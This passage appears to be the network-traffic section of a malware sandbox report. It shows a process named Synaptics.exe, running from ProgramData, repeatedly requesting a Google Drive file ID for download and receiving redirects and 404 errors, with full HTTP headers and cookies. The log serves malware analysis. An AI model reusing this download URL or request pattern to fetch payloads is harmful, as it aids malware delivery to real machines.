                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:40 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce--W7XS9W0WI45mIuQgoYYow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:40 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:29:40 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="G9QtN6N2Wz4RYPj1oMy1lA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:29:40 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            13 | 192.168.2.9 | 49827 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:40 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                                                                                            2025-01-02 19:29:40 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC69dYK0FNYHSNUpZD9IKA49rX32prAEPTASeClKP0ZyJNn-1eaQnzV0z2yyT73gL2-q
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:40 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-WnTvZgPk8Q_1wndmH27oag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:40 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:29:40 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="D0fwY65nxP2klTo0u_MJTA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:29:40 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            14 | 192.168.2.9 | 49843 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:41 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
2025-01-02 19:29:42 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC5njZ0O6RLPwF0SWoclJGltMA9ZUvaKO9CShYeHIG0Xeh_WonXKwrxn_sDDzpsAiuRV
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:41 GMT
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-x7i3v9nP3K3FdGS-VjK1gQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
2025-01-02 19:29:42 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2025-01-02 19:29:42 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="EL02tItUBBjLEDbzZs4N4Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2025-01-02 19:29:42 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.9 | 49844 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:41 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
2025-01-02 19:29:41 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:41 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-GBYZJOEP58DamHQXypaS1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.9 | 49841 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:41 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
2025-01-02 19:29:42 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC7d0VWBv34ZQLRsPG3OKChSJYO-WXHJipvBRLR5SjTXcNJ5-6A6pK_3atu750fYmxjw-CTuuP4
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:41 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-UoRYCGhOzfMkS7MvUI9o1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
2025-01-02 19:29:42 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2025-01-02 19:29:42 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="0rTNNmtxETDVqlFFauf4Qg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2025-01-02 19:29:42 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.9 | 49842 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:41 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
2025-01-02 19:29:42 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:41 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-XXA-Haw4E6X9GHRUwxOdFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.9 | 49855 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:42 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
2025-01-02 19:29:43 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:42 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-lVzL-2wnwtN1F3aV0BQABw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.9 | 49856 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:42 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
2025-01-02 19:29:43 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:42 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-A0bJAJpPy6T67Za3wRtDwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.9 | 49858 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:42 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
2025-01-02 19:29:43 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC5gstVG9ouQspWNOvWXlWMKIOc_4q-zauMGlryv7fSQO1QkjRcCjsIiBB08XSid9f5p
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:43 GMT
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-TOnM3njbDoZvr9dpqpqA4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
2025-01-02 19:29:43 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2025-01-02 19:29:43 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="E7nB705iiYEP7jdJSrmBpQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2025-01-02 19:29:43 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.9 | 49857 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:42 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
2025-01-02 19:29:43 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC6FmOF4nQB1QFLxUKowGzw4M578Y53Gpgwcr-5qXO50kj3yg2E8KDIu2MBUV4GIPlfRnw708PY
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:43 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-B1C1s3xvcKgqplh3l5kGEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
2025-01-02 19:29:43 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2025-01-02 19:29:43 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="Ouimtxd-ZgGLizCYhRGNGw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2025-01-02 19:29:43 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.9 | 49869 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:43 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
2025-01-02 19:29:44 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC6yuRk96Asy0M-_vUlLbrGGPx_bf5wMgLT1317HoWvzNYudNOpzdPLyowWj1bMZzobc
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:44 GMT
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-fJQwG76P72Cf8HTF18hkRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
